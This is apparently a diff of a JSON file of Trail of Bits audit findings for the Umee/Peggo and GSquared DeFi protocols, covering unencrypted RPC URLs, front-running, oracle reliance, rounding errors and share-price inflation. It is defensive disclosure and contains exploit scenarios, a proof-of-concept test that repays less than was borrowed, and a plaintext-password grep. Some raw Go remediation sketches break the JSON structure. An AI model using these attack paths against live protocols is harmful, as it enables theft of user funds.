", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The peggo orchestrator command takes --tendermint-rpc and --cosmos-grpc flags specifying Tendermint and Cosmos remote procedure call (RPC) URLs. If an unencrypted non-local URL scheme (such as http://) is passed to one of those flags, Peggo will not reject it or issue a warning to the user. As a result, an attacker connected to the same local network as the system running Peggo could launch a man-in-the-middle attack, intercepting and modifying the network traffic of the device. $ peggo orchestrator {gravityAddress} \\ --eth-pk=$ETH_PK \\ --eth-rpc=$ETH_RPC \\ --relay-batches=true \\ --relay-valsets=true \\ --cosmos-chain-id=... \\ --cosmos-grpc=\"tcp://...\" \\ --tendermint-rpc=\"http://...\" \\ --cosmos-keyring=... \\ --cosmos-keyring-dir=... \\ --cosmos-from=... Figure 30.1: The problematic flags Exploit Scenario A user sets up Peggo with an external Tendermint RPC address and an unencrypted URL scheme (http://). An attacker on the same network performs a man-in-the-middle attack, modifying the values sent to the Peggo orchestrator to his advantage.
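For finding 30, a minimal Go sketch of the recommended warning: parse each RPC endpoint and flag unencrypted schemes on non-loopback hosts before the orchestrator starts. The set of schemes treated as unencrypted here is an assumption for illustration.

```go
package main

import (
	"fmt"
	"net"
	"net/url"
)

// warnIfInsecure returns an error for unencrypted schemes pointing at
// non-local hosts; loopback endpoints are allowed.
func warnIfInsecure(raw string) error {
	u, err := url.Parse(raw)
	if err != nil {
		return err
	}
	if u.Scheme != "http" && u.Scheme != "tcp" {
		return nil // https, wss, and similar encrypted schemes are fine
	}
	host := u.Hostname()
	if host == "localhost" {
		return nil
	}
	if ip := net.ParseIP(host); ip != nil && ip.IsLoopback() {
		return nil
	}
	return fmt.Errorf("endpoint %s uses an unencrypted scheme on a non-local host; traffic can be intercepted", raw)
}

func main() {
	if err := warnIfInsecure("http://rpc.example.com:26657"); err != nil {
		fmt.Println("warning:", err)
	}
}
```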
Recommendations Short term, warn users that they risk a man-in-the-middle attack if they set the RPC endpoint addresses to external hosts that use unencrypted schemes such as http://.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: Medium" ] }, { - "title": "8. getYieldTokenAmount uses convertToAssets instead of convertToShares ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The getYieldTokenAmount function does not properly convert a 3CRV token amount into a G3CRV token amount, which may allow a user to withdraw more or less than expected or lead to imbalanced tranches after a migration. The expected behavior of the getYieldTokenAmount function is to return the number of G3CRV tokens represented by a given 3CRV amount. For withdrawals, this will determine how many G3CRV tokens should be returned back to the GRouter contract. For migrations, the function is used to figure out how many G3CRV tokens should be allocated to the senior and junior tranches. To convert a given amount of 3CRV to G3CRV, the GVault.convertToShares function should be used. However, the getYieldTokenAmount function uses the GVault.convertToAssets function (figure 8.1). Thus, getYieldTokenAmount takes an amount of 3CRV tokens and treats it as shares in the GVault, instead of assets. function getYieldTokenAmount(uint256 _index, uint256 _amount) internal view returns (uint256) { return getYieldToken(_index).convertToAssets(_amount); } Figure 8.1: The getYieldTokenAmount function in GTranche.sol#L169-175 If the system is profitable, each G3CRV share should be worth more over time. Thus, getYieldTokenAmount will return a value larger than expected because one share is worth more than one asset. This allows a user to withdraw more from the GTranche contract than they should be able to. Additionally, a profitable system will cause the senior tranche to receive more G3CRV tokens than expected during migrations. A similar situation can happen if the system is not profitable. Exploit Scenario Alice deposits $100 worth of USDC into the system. After a certain amount of time, the GSquared protocol becomes profitable and Alice should be able to withdraw $110, making $10 in profit. However, due to the incorrect arithmetic performed in the getYieldTokenAmount function, Alice is able to withdraw $120 of USDC. Recommendations Short term, use convertToShares instead of convertToAssets in getYieldTokenAmount. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "31. Lack of prioritization of Peggo orchestrator messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Peggo orchestrator messages, like oracle messages ( TOB-UMEE-20 ), are not prioritized over other transactions for inclusion in a block. As a result, if the network is highly congested, orchestrator transactions may not be included in the earliest possible block. Although the Umee system could increase the fee charged for including a Peggo orchestrator message in a block, that solution is suboptimal and may not work.
Tactics for prioritizing important transactions include the following: using the custom CheckTx implementation introduced in Tendermint version 0.35, which returns a priority argument; reimplementing part of the Tendermint engine, as Terra Money did; and using Substrate's dispatch classes, which allow developers to mark transactions as normal, operational, or mandatory. Exploit Scenario A user sends tokens from Ethereum to Umee by calling Gravity Bridge's sendToCosmos function. When validators notice the transaction in the Ethereum logs, they send MsgSendToCosmosClaim messages to Umee. However, 34% of the messages are front-run by an attacker, effectively stopping Umee from acknowledging the token transfer. Recommendations Short term, use a custom CheckTx method to prioritize Peggo orchestrator messages. Long term, ensure that operations that affect the whole system cannot be front-run or delayed by attackers or blocked by network congestion.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Undetermined", + "Difficulty: Medium" ] }, { - "title": "9. convertToShares can be manipulated to block deposits ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "An attacker can block operations by using direct token transfers to manipulate convertToShares, which computes the amount of shares to deposit. convertToShares is used in the GVault code to know how many shares correspond to a certain amount of assets: /// @notice Value of asset in shares /// @param _assets amount of asset to convert to shares function convertToShares(uint256 _assets) public view override returns (uint256 shares) { uint256 freeFunds_ = _freeFunds(); // Saves an extra SLOAD if _freeFunds is non-zero. return freeFunds_ == 0 ? _assets : (_assets * totalSupply) / freeFunds_; } Figure 9.1: The convertToShares function in GVault.sol This function relies on the _freeFunds function to calculate the amount of shares: /// @notice the number of total assets the GVault has excluding profits /// and losses function _freeFunds() internal view returns (uint256) { return _totalAssets() - _calculateLockedProfit(); } Figure 9.2: The _freeFunds function in GVault.sol In the simplest case, _calculateLockedProfit() can be assumed as zero if there is no locked profit. The _totalAssets function is implemented as follows: /// @notice Vault adapter's total assets including loose assets and debts /// @dev note that this does not consider estimated gains/losses from the strategies function _totalAssets() private view returns (uint256) { return asset.balanceOf(address(this)) + vaultTotalDebt; } Figure 9.3: The _totalAssets function in GVault.sol However, the fact that _totalAssets has a lower bound determined by asset.balanceOf(address(this)) can be exploited to manipulate the result by "donating" assets to the GVault address. Exploit Scenario Alice deploys a new GVault. Eve observes the deployment and quickly transfers an amount of tokens to the GVault address. One of two scenarios can happen: 1. Eve transfers a minimal amount of tokens, forcing a positive amount of freeFunds.
This will block any immediate calls to deposit, since it will result in zero shares to be minted. 2. Eve transfers a large amount of tokens, forcing future deposits to be more expensive or resulting in zero shares. Every new deposit can increase the amount of free funds, making the effect more severe. It is important to note that although Alice cannot use the deposit function, she can still call mint to bypass the exploit. Recommendations Short term, use a state variable, assetBalance, to track the total balance of assets in the contract. Avoid using balanceOf, which is prone to manipulation. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "33. Peggo orchestrator's IsBatchProfitable function uses only one price oracle ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Peggo orchestrator relays batches of Ethereum transactions only when doing so will be profitable (figure 33.1). To determine an operation's profitability, it uses the price of ETH in USD, which is fetched from a single source, the CoinGecko API. This creates a single point of failure, as a hacker with control of the API could effectively choose which batches Peggo would relay by manipulating the price. The IsBatchProfitable function (figure 33.2) fetches the ETH/USD price; the gravityRelayer.priceFeeder field it uses is set earlier in the getOrchestratorCmd function (figure 33.3). func (s *gravityRelayer) RelayBatches( /* (...) */ ) error { // (...) for tokenContract, batches := range possibleBatches { // (...) // Now we iterate through batches per token type. for _, batch := range batches { // (...) // If the batch is not profitable, move on to the next one. if !s.IsBatchProfitable(ctx, batch.Batch, estimatedGasCost, gasPrice, s.profitMultiplier) { continue } // (...) Figure 33.1: peggo/orchestrator/relayer/batch_relaying.go#L173-L176 func (s *gravityRelayer) IsBatchProfitable( /* (...) */ ) bool { // (...) // First we get the cost of the transaction in USD usdEthPrice, err := s.priceFeeder.QueryETHUSDPrice() Figure 33.2: peggo/orchestrator/relayer/batch_relaying.go#L211-L223 func getOrchestratorCmd() *cobra.Command { cmd := &cobra.Command{ Use: "orchestrator [gravity-addr]", Args: cobra.ExactArgs(1), Short: "Starts the orchestrator", RunE: func(cmd *cobra.Command, args []string) error { // (...) coingeckoAPI := konfig.String(flagCoinGeckoAPI) coingeckoFeed := coingecko.NewCoingeckoPriceFeed( /* (...) */ ) // (...) relayer := relayer.NewGravityRelayer( /* (...) */, relayer.SetPriceFeeder(coingeckoFeed), ) Figure 33.3: peggo/cmd/peggo/orchestrator.go#L162-L188 Exploit Scenario All Peggo orchestrator instances depend on the CoinGecko API. An attacker hacks the CoinGecko API and falsifies the ETH/USD prices provided to the Peggo relayers, causing them to relay unprofitable batches. Recommendations Short term, address the Peggo orchestrator's reliance on a single ETH/USD price feed. Consider using the price-feeder tool to fetch pricing information or reading prices from the Umee blockchain. Long term, implement protections against extreme ETH/USD price changes; if the ETH/USD price changes by too large a margin, have the system stop fetching prices and require an operator to investigate whether the issue was caused by malicious behavior. Additionally, implement tests to check the orchestrator's handling of random and extreme changes in the prices reported by the price feed.
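One way to remove the single point of failure described above is to aggregate several independent sources and take the median; a minimal sketch, where only the QueryETHUSDPrice method name is taken from the report's figures and the rest is illustrative wiring:

package main

import (
	"fmt"
	"sort"
)

type priceFeed interface {
	QueryETHUSDPrice() (float64, error)
}

// medianETHUSD returns the median of the prices reported by working feeds,
// so a single compromised source cannot steer batch selection on its own.
func medianETHUSD(feeds []priceFeed) (float64, error) {
	var prices []float64
	for _, f := range feeds {
		if p, err := f.QueryETHUSDPrice(); err == nil {
			prices = append(prices, p)
		}
	}
	if len(prices) < 2 { // require a quorum of working feeds
		return 0, fmt.Errorf("not enough price sources: %d", len(prices))
	}
	sort.Float64s(prices)
	mid := len(prices) / 2
	if len(prices)%2 == 0 {
		return (prices[mid-1] + prices[mid]) / 2, nil
	}
	return prices[mid], nil
}

type fixedFeed struct{ p float64 }

func (f fixedFeed) QueryETHUSDPrice() (float64, error) { return f.p, nil }

func main() {
	m, err := medianETHUSD([]priceFeed{fixedFeed{1600}, fixedFeed{1610}, fixedFeed{9999}})
	fmt.Println(m, err) // 1610: the outlier cannot move the median on its own
}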
References Check Coingecko prices separately from BatchRequesterLoop (GitHub issue)", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "10. Harvest operation could be blocked if eligibility check on a strategy reverts ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "During harvest, if any of the strategies in the queue were to revert, it would prevent the loop from reaching the end of the queue and also block the entire harvest operation. When the harvest function is executed, a loop iterates through each of the strategies in the strategies queue, and the canHarvest() check runs on each strategy to determine if it is eligible for harvesting; if it is, the harvest logic is executed on that strategy. /// @notice Execute strategy harvest function harvest() external { if (msg.sender != keeper) revert GuardErrors.NotKeeper(); uint256 strategiesLength = strategies.length; for (uint256 i; i < strategiesLength; i++) { address strategy = strategies[i]; if (strategy == address(0)) continue; if (IStrategy(strategy).canHarvest()) { if (strategyCheck[strategy].active) { IStrategy(strategy).runHarvest(); try IStrategy(strategy).runHarvest() {} catch Error( ... Figure 10.1: The harvest function in GStrategyGuard.sol However, if the canHarvest() check on a particular strategy within the loop reverts, external calls from the canHarvest() function to check the status of rewards could also revert. Since the call to canHarvest() is not inside of a try block, this would prevent the loop from proceeding to the next strategy in the queue (if there is one) and would block the entire harvest operation. Additionally, within the harvest function, the runHarvest function is called twice on a strategy on each iteration of the loop. This could lead to unnecessary waste of gas and possibly undefined behavior. Recommendations Short term, wrap external calls within the loop in try and catch blocks, so that reverts can be handled gracefully without blocking the entire operation. Additionally, ensure that the canHarvest function of a strategy can never revert. Long term, carefully audit operations that consume a large amount of gas, especially those in loops. Additionally, when designing logic loops that make external calls, be mindful as to whether the calls can revert, and wrap them in try and catch blocks when necessary.", + "title": "34. Rounding errors may cause the module to incur losses ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The amount that a user has borrowed is calculated using AdjustedBorrow data and an InterestScalar value. Because the system uses fixed-precision decimal numbers that are truncated to integer values, there may be small rounding errors in the computation of those amounts. If an error occurs, it will benefit the user, whose repayment will be slightly lower than the amount the user borrowed. Figure 34.1 shows a test case demonstrating this vulnerability. It should be added to the umee/x/leverage/keeper/keeper_test.go file. Appendix G discusses general rounding recommendations.
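Before the full reproduction test in figure 34.1, a simplified standalone model of the truncation effect; the accounting below is illustrative, not the module's actual decimal API:

package main

import (
	"fmt"
	"math/big"
)

var pow18 = new(big.Int).Exp(big.NewInt(10), big.NewInt(18), nil)

// trunc18 truncates a rational to 18 decimal places, like a fixed-precision
// decimal type; truncInt truncates it to a whole-token integer.
func trunc18(r *big.Rat) *big.Rat {
	s := new(big.Rat).Mul(r, new(big.Rat).SetInt(pow18))
	return new(big.Rat).SetFrac(new(big.Int).Quo(s.Num(), s.Denom()), pow18)
}

func truncInt(r *big.Rat) *big.Int {
	return new(big.Int).Quo(r.Num(), r.Denom())
}

func main() {
	scalar := big.NewRat(29, 10) // interest scalar of 2.9, as in the test
	// Borrow 20,000,000 tokens, stored as adjusted = amount / scalar (truncated).
	adjusted := trunc18(new(big.Rat).Quo(big.NewRat(20000000, 1), scalar))

	repaid := int64(0)
	for i := 0; i < 99; i++ {
		// The debt visible to the borrower is truncated to whole tokens; each
		// 2,000-token repayment is applied to that truncated figure, and the
		// new adjusted borrow is again a truncated division, so a sliver of
		// debt evaporates on each round trip.
		owed := truncInt(new(big.Rat).Mul(adjusted, scalar))
		remaining := new(big.Int).Sub(owed, big.NewInt(2000))
		adjusted = trunc18(new(big.Rat).Quo(new(big.Rat).SetInt(remaining), scalar))
		repaid += 2000
	}
	repaid += truncInt(new(big.Rat).Mul(adjusted, scalar)).Int64()
	fmt.Println("borrowed 20000000, repaid", repaid) // slightly under 20,000,000
}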
// Test rounding error bug - users can repay less than have borrowed // It should pass func (s *IntegrationTestSuite) TestTruncationBug() { lenderAddr, _ := s.initBorrowScenario() app, ctx := s.app, s.ctx // set some interesting interest scalar _ = s.app.LeverageKeeper.SetInterestScalar(s.ctx, umeeapp.BondDenom, sdk.MustNewDecFromStr("2.9")) // save initial balances initialSupply := s.app.BankKeeper.GetSupply(s.ctx, umeeapp.BondDenom) s.Require().Equal(initialSupply.Amount.Int64(), int64(10000000000)) initialModuleBalance := s.app.LeverageKeeper.ModuleBalance(s.ctx, umeeapp.BondDenom) // lender borrows 20 umee err := s.app.LeverageKeeper.BorrowAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 20000000)) s.Require().NoError(err) // lender repays in a few transactions iters := int64(99) payOneIter := int64(2000) amountDelta := int64(99) // borrower expects to "earn" this amount for i := int64(0); i < iters; i++ { repaid, err := s.app.LeverageKeeper.RepayAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, payOneIter)) s.Require().NoError(err) s.Require().Equal(sdk.NewInt(payOneIter), repaid) } // lender repays remaining debt - less than he borrowed // we send 90000000, because it will be truncated to the actually owed amount repaid, err := s.app.LeverageKeeper.RepayAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 90000000)) s.Require().NoError(err) s.Require().Equal(repaid.Int64(), 20000000-(iters*payOneIter)-amountDelta) // verify lender's new loan amount in the correct denom (zero) loanBalance := s.app.LeverageKeeper.GetBorrow(ctx, lenderAddr, umeeapp.BondDenom) s.Require().Equal(loanBalance, sdk.NewInt64Coin(umeeapp.BondDenom, 0)) // we expect total supply to not change finalSupply := s.app.BankKeeper.GetSupply(s.ctx, umeeapp.BondDenom) s.Require().Equal(initialSupply, finalSupply) // verify lender's new umee balance // should be 10k - 1k from initial + 20 from loan - 20 repaid = 9000 umee // it is more -> borrower benefits tokenBalance := app.BankKeeper.GetBalance(ctx, lenderAddr, umeeapp.BondDenom) s.Require().Equal(tokenBalance, sdk.NewInt64Coin(umeeapp.BondDenom, 9000000000+amountDelta)) // in test, we didn't pay interest, so module balance should not have changed // but it did because of rounding moduleBalance := s.app.LeverageKeeper.ModuleBalance(s.ctx, umeeapp.BondDenom) s.Require().NotEqual(moduleBalance, initialModuleBalance) s.Require().Equal(moduleBalance.Int64(), int64(1000000000-amountDelta)) } Figure 34.1: A test case demonstrating the rounding bug Exploit Scenario An attacker identifies a high-value coin. He takes out a loan and repays it in a single transaction and then repeats the process again and again. By using a single transaction for both operations, he evades the borrowing fee (i.e., the interest scalar is not increased). Because of rounding errors in the system's calculations, he turns a profit by repaying less than he borrowed each time. His profits exceed the transaction fees, and he continues his attack until he has completely drained the module of its funds. Exploit Scenario 2 The Umee system has numerous users. Each user executes many transactions, so the system must perform many calculations. Each calculation with a rounding error causes it to lose a small amount of tokens, but eventually, the small losses add up and leave the system without the essential funds. Recommendations Short term, always use the rounding direction that will benefit the module rather than the user.
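A minimal sketch of that rounding direction, using ceiling division on a rational amount; an illustrative helper, not the SDK's actual decimal API:

package main

import (
	"fmt"
	"math/big"
)

// ceilInt rounds a positive rational amount up to the next whole token, so
// conversions err on the module's side rather than the borrower's.
func ceilInt(r *big.Rat) *big.Int {
	q, rem := new(big.Int).QuoRem(r.Num(), r.Denom(), new(big.Int))
	if rem.Sign() != 0 {
		q.Add(q, big.NewInt(1))
	}
	return q
}

func main() {
	owed := big.NewRat(5799999999, 1000000) // 5,799.999999 tokens of debt
	fmt.Println(ceilInt(owed))              // 5800: rounding favors the module
}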
Long term, to ensure that users pay the necessary fees, consider prohibiting them from borrowing and repaying a loan in the same block. Additionally, use fuzz testing to ensure that it is not possible for users to secure free tokens. References How to Become a Millionaire, 0.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "11. Incorrect rounding direction in GVault ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The minting and withdrawal operations in the GVault use rounding in favor of the user instead of the protocol, giving away a small amount of shares or assets that can accumulate over time. convertToShares is used in the GVault code to know how many shares correspond to a certain amount of assets: /// @notice Value of asset in shares /// @param _assets amount of asset to convert to shares function convertToShares(uint256 _assets) public view override returns (uint256 shares) { uint256 freeFunds_ = _freeFunds(); // Saves an extra SLOAD if _freeFunds is non-zero. return freeFunds_ == 0 ? _assets : (_assets * totalSupply) / freeFunds_; } Figure 11.1: The convertToShares function in GVault.sol This function rounds down, providing slightly fewer shares than expected for some amount of assets. Additionally, convertToAssets is used in the GVault code to know how many assets correspond to a certain amount of shares: /// @notice Value of shares in underlying asset /// @param _shares amount of shares to convert to tokens function convertToAssets(uint256 _shares) public view override returns (uint256 assets) { uint256 _totalSupply = totalSupply; // Saves an extra SLOAD if _totalSupply is non-zero. return _totalSupply == 0 ? _shares : ((_shares * _freeFunds()) / _totalSupply); } Figure 11.2: The convertToAssets function in GVault.sol This function also rounds down, providing slightly fewer assets than expected for some amount of shares. However, the mint function uses previewMint, which uses convertToAssets: function mint(uint256 _shares, address _receiver) external override nonReentrant returns (uint256 assets) { // Check for rounding error in previewMint. if ((assets = previewMint(_shares)) == 0) revert Errors.ZeroAssets(); _mint(_receiver, _shares); asset.safeTransferFrom(msg.sender, address(this), assets); emit Deposit(msg.sender, _receiver, assets, _shares); return assets; } Figure 11.3: The mint function in GVault.sol This means that the function favors the user, since they get some fixed amount of shares for a rounded-down amount of assets. In a similar way, the withdraw function uses convertToShares: function withdraw(uint256 _assets, address _receiver, address _owner) external override nonReentrant returns (uint256 shares) { if (_assets == 0) revert Errors.ZeroAssets(); shares = convertToShares(_assets); if (shares > balanceOf[_owner]) revert Errors.InsufficientShares(); if (msg.sender != _owner) { uint256 allowed = allowance[_owner][msg.sender]; // Saves gas for limited approvals.
if (allowed != type(uint256).max) allowance[_owner][msg.sender] = allowed - shares; } _assets = beforeWithdraw(_assets, asset); _burn(_owner, shares); asset.safeTransfer(_receiver, _assets); emit Withdraw(msg.sender, _receiver, _owner, _assets, shares); return shares; } Figure 11.4: The withdraw function in GVault.sol This means that the function favors the user, since they get some fixed amount of assets for a rounded-down amount of shares. This issue should also be considered when minting fees, since they should favor the protocol instead of the user or the strategy. Exploit Scenario Alice deploys a new GVault and provides some liquidity. Eve uses mints and withdrawals to slowly drain the liquidity, possibly affecting the internal bookkeeping of the GVault. Recommendations Short term, consider refactoring the GVault code to specify the rounding direction across the codebase in order to keep the error in favor of the user or the protocol. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "35. Outdated and vulnerable dependencies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Both Umee and Peggo rely on outdated and vulnerable dependencies. The table below lists the problematic packages used by Umee dependencies; the yellow rows indicate packages that were also detected in Peggo dependencies. We set the severity of this finding to undetermined because we could not confirm whether these vulnerabilities affect Umee or Peggo. However, they likely do not, since most of the CVEs are related to binaries or components that are not run in the Umee or Peggo code. Package golang/github.com/coreos/etcd@3.3.13: CVE-2020-15114, CVE-2020-15136, CVE-2020-15115. Package pkg:golang/github.com/dgrijalva/jwt-go@3.2.0: CVE-2020-26160. Package golang/github.com/microcosm-cc/bluemonday@1.0.4: #111 (CWE-79). Package golang/k8s.io/kubernetes@1.13.0: CVE-2020-8558, CVE-2019-11248, CVE-2019-11247, CVE-2019-11243, CVE-2021-25741, CVE-2019-9946, CVE-2020-8552, CVE-2019-11253, CVE-2020-8559, CVE-2021-25735, CVE-2019-11250, CVE-2019-11254, CVE-2019-11249, CVE-2019-11246, CVE-2019-1002100, CVE-2020-8555, CWE-601, CVE-2019-11251, CVE-2019-1002101, CVE-2020-8563, CVE-2020-8557, CVE-2019-11244. Recommendations Short term, update the outdated and vulnerable dependencies. Even if they do not currently affect Umee or Peggo, a change in the way they are used could introduce a bug. Long term, integrate a dependency-checking tool such as nancy into the CI/CD pipeline. Frequently update any direct dependencies, and ensure that any indirect dependencies in upstream libraries remain up to date.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Undetermined", + "Difficulty: High" ] }, { - "title": "12. Protocol migration is vulnerable to front-running and a loss of funds ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The migration from Gro protocol to GSquared protocol can be front-run by manipulating the share price enough that the protocol loses a large amount of funds.
The GMigration contract is responsible for initiating the migration from Gro to GSquared. The GMigration.prepareMigration function will deposit liquidity into the three-pool and then attempt to deposit the 3CRV LP token into the GVault contract in exchange for G3CRV shares (figure 12.1). Note that this migration occurs on a newly deployed GVault contract that holds no assets and has no supply of shares. function prepareMigration(uint256 minAmountThreeCRV) external onlyOwner { if (!IsGTrancheSet) { revert Errors.TrancheNotSet(); } // read senior tranche value before migration seniorTrancheDollarAmount = SeniorTranche(PWRD).totalAssets(); uint256 DAI_BALANCE = ERC20(DAI).balanceOf(address(this)); uint256 USDC_BALANCE = ERC20(USDC).balanceOf(address(this)); uint256 USDT_BALANCE = ERC20(USDT).balanceOf(address(this)); // approve three pool ERC20(DAI).safeApprove(THREE_POOL, DAI_BALANCE); ERC20(USDC).safeApprove(THREE_POOL, USDC_BALANCE); ERC20(USDT).safeApprove(THREE_POOL, USDT_BALANCE); // swap for 3crv IThreePool(THREE_POOL).add_liquidity([DAI_BALANCE, USDC_BALANCE, USDT_BALANCE], minAmountThreeCRV); // check 3crv amount received uint256 depositAmount = ERC20(THREE_POOL_TOKEN).balanceOf(address(this)); // approve 3crv for GVault ERC20(THREE_POOL_TOKEN).safeApprove(address(gVault), depositAmount); // deposit into GVault uint256 shareAmount = gVault.deposit(depositAmount, address(this)); // approve gVaultTokens for gTranche ERC20(address(gVault)).safeApprove(address(gTranche), shareAmount); } Figure 12.1: The prepareMigration function in GMigration.sol#L61-98 However, this prepareMigration function call is vulnerable to a share price inflation attack. As noted in this issue, the end result of the attack is that the shares (G3CRV) that the GMigration contract will receive can redeem only a portion of the assets that were originally deposited by GMigration into the GVault contract. This occurs because the first depositor in the GVault is capable of manipulating the share price significantly, which is compounded by the fact that the deposit function in GVault rounds in favor of the protocol due to a division in convertToShares (see TOB-GRO-11). Exploit Scenario Alice, a GSquared developer, calls prepareMigration to begin the process of migrating funds from Gro to GSquared. Eve notices this transaction in the public mempool, and front-runs it with a small deposit and a large token (3CRV) airdrop. This leads to a significant change in the share price. The prepareMigration call completes, but GMigration is left with a small, insufficient amount of shares because it has suffered from truncation in the convertToShares function. These shares can be redeemed for only a portion of the original deposit. Recommendations Short term, perform the GSquared system deployment and protocol migration using a private relay. This will mitigate the risk of front-running the migration or price share manipulation. Long term, implement the short- and long-term recommendations outlined in TOB-GRO-11. Additionally, implement an ERC4626Router similar to Fei protocol's implementation so that a minimum-amount-out can be specified for deposit, mint, redeem, and withdraw operations. References ERC4626RouterBase.sol ERC4626 share price inflation", + "title": "25.
Insecure storage of price-feeder keyring passwords ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Users can store oracle keyring passwords in the price-feeder configuration file. However, the price-feeder stores these passwords in plaintext and does not provide a warning if the configuration file has overly broad permissions (like those shown in figure 25.1). Additionally, neither the price-feeder README nor the relevant documentation string instructs users to provide keyring passwords via standard input (figure 25.2), which is a safer approach. Moreover, neither source provides information on different keyring back ends, and the example price-feeder configuration uses the "test" back end. An attacker with access to the configuration file on a user's system, or to a backup of the configuration file, could steal the user's keyring information and hijack the price-feeder oracle instance. $ ls -la ./price-feeder/price-feeder.example.toml -rwxrwxrwx 1 dc dc 848 Feb 6 10:37 ./price-feeder/price-feeder.example.toml $ grep pass ./price-feeder/price-feeder.example.toml pass = "exampleKeyringPassword" $ ~/go/bin/price-feeder ./price-feeder/price-feeder.example.toml 10:42AM INF starting price-feeder oracle... 10:42AM ERR oracle tick failed error="key with address A4F324A31DECC0172A83E57A3625AF4B89A91F1F not found: key not found" module=oracle 10:42AM INF starting price-feeder server... listen_addr=0.0.0.0:7171 Figure 25.1: The price-feeder does not warn the user if the configuration file used to store the keyring password in plaintext has overly broad permissions. // CreateClientContext creates an SDK client Context instance used for transaction // generation, signing and broadcasting. func (oc OracleClient) CreateClientContext() (client.Context, error) { var keyringInput io.Reader if len(oc.KeyringPass) > 0 { keyringInput = newPassReader(oc.KeyringPass) } else { keyringInput = os.Stdin } Figure 25.2: The price-feeder supports the use of standard input to provide keyring passwords. (umee/price-feeder/oracle/client/client.go#L184-L192) Exploit Scenario A user sets up a price-feeder oracle and stores the keyring password in the price-feeder configuration file, which has been misconfigured with overly broad permissions. An attacker gains access to another user account on the user's machine and is able to read the price-feeder oracle's keyring password. The attacker uses that password to access the keyring data and can then control the user's oracle account. Recommendations Short term, take the following steps: Recommend that users provide keyring passwords via standard input. Check the permissions of the configuration file. If the permissions are too broad, provide an error warning the user of the issue, as openssh does when it finds that a private key file has overly broad permissions. Document the risks associated with storing a keyring password in the configuration file. Improve the price-feeder's keyring-related documentation. Include a link to the Cosmos SDK keyring documentation so that users can learn about different keyring back ends and the addition of keyring entries, among other concepts.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: High" ] }, { - "title": "13.
Incorrect slippage calculation performed during strategy investments and divestitures ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The incorrect arithmetic calculation for slippage tolerance during strategy investments and divestitures can lead to an increased rate of failed profit-and-loss (PnL) reports and withdrawals. The ConvexStrategy contract is tasked with investing excess funds into a meta pool to obtain yield and divesting those funds from the pool whenever necessary. Investments are done via the invest function, and divestitures for a given amount are done via the divest function. Both functions have the ability to manage the amount of slippage that is allowed during the deposit and withdrawal from the meta pool. For example, in the divest function, the withdrawal will go through only if the amount of 3CRV tokens that will be transferred out from the pool (by burning meta pool tokens) is greater than or equal to the _debt, the amount of 3CRV that needs to be transferred out from the pool, discounted by baseSlippage (figure 13.1). Thus, both sides of the comparison must have units of 3CRV. function divest(uint256 _debt, bool _slippage) internal returns (uint256) { uint256 meta_amount = ICurveMeta(metaPool).calc_token_amount([0, _debt], false); if (_slippage) { uint256 ratio = curveValue(); if ((meta_amount * PERCENTAGE_DECIMAL_FACTOR) / ratio < ((_debt * (PERCENTAGE_DECIMAL_FACTOR - baseSlippage)) / PERCENTAGE_DECIMAL_FACTOR)) { revert StrategyErrors.LTMinAmountExpected(); } } Rewards(rewardContract).withdrawAndUnwrap(meta_amount, false); return ICurveMeta(metaPool).remove_liquidity_one_coin(meta_amount, CRV3_INDEX, /* ... */); } Figure 13.1: The divest function in ConvexStrategy.sol#L883-905 To calculate the value of a meta pool token (mpLP) in terms of 3CRV, the curveValue function is called (figure 13.2). The units of the return value, ratio, are 3CRV/mpLP. function curveValue() internal view returns (uint256) { uint256 three_pool_vp = ICurve3Pool(CRV_3POOL).get_virtual_price(); uint256 meta_pool_vp = ICurve3Pool(metaPool).get_virtual_price(); return (meta_pool_vp * PERCENTAGE_DECIMAL_FACTOR) / three_pool_vp; } Figure 13.2: The curveValue function in ConvexStrategy.sol#L1170-1174 However, note that in figure 13.1, the meta_amount value, which is the amount of mpLP tokens that need to be burned, is divided by ratio. From a unit perspective, this is multiplying an mpLP amount by a mpLP/3CRV ratio. The resultant units are not 3CRV. Instead, the arithmetic should be meta_amount multiplied by ratio. This would be mpLP times 3CRV/mpLP, which would result in the final units of 3CRV. Assuming 3CRV/mpLP is greater than one, the division instead of multiplication will result in a smaller value, which increases the likelihood that the slippage tolerance is not met. The invest and divest functions are called during PnL reporting and withdrawals. If there is a higher risk for the functions to revert because the slippage tolerance is not met, the likelihood of failed PnL reports and withdrawals also increases. Exploit Scenario Alice wishes to withdraw some funds from the GSquared protocol. She calls GRouter.withdraw with a reasonable 